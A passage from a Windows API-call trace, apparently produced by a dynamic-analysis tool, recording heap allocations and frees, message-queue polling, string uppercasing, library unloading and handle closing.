lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0198.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0198.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0198.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0198.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0198.877] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0198.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0198.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0198.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0198.877] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0198.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0198.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0198.878] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0198.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0198.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0198.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0198.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0198.878] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0198.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0198.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0198.879] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0198.879] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0198.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0198.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0198.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0198.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0198.880] FreeLibrary (hLibModule=0x74d40000) returned 1 [0198.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0198.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.880] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0198.880] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0198.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.880] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0198.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0198.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0198.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0198.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0198.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0198.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0198.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0198.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0198.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0198.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0198.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0198.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0198.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0198.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0198.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c48 [0198.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0198.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0198.881] CloseHandle (hObject=0x294) returned 1 [0198.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0198.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0198.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0198.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0198.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0198.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0198.885] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0198.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0198.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0198.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0198.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0198.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0198.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0198.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0198.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0198.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0198.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0198.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0198.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c48 [0198.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.886] CloseHandle (hObject=0x268) returned 1 [0198.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0198.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0198.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0198.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0198.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0198.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0198.889] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0198.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0198.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0198.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0198.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0198.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0198.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0198.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0198.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0198.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0198.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0198.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0198.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0198.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0198.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0198.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0198.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0198.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0198.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0198.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0198.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0198.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0198.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0198.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0198.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0198.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0198.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0198.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0198.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0198.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0198.893] HeapFree (in: 